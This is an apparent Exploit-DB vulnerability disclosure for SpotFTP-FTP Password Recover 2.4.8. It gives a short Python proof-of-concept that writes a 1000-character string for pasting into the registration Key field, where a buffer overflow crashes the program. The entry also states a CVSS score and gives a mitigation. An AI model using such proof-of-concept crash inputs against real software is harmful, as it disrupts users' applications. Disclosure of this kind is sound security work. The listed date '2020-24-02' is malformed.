SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)

vendor:

SpotFTP

by:

Ismael Nava

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: SpotFTP

Affected Version From: 2.4.8

Affected Version To: 2.4.8

Patch Exists: NO

Related CWE: n/a

CPE: a:nsauditor:spotftp:2.4.8

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2020

SpotFTP-FTP Password Recover 2.4.8 – Denial of Service (PoC)

A Denial of Service vulnerability exists in SpotFTP-FTP Password Recover 2.4.8 when a maliciously crafted file is used to cause a buffer overflow. An attacker can exploit this vulnerability by creating a file with a large amount of data and then copying the contents of the file into the Key field of the Enter Registration Code window. This will cause the application to crash.

Mitigation:

Users should ensure that they are running the latest version of SpotFTP-FTP Password Recover and should not open files from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the  Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)

buffer = 'Z' * 1000

try: 
    file = open("RandomLetter.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")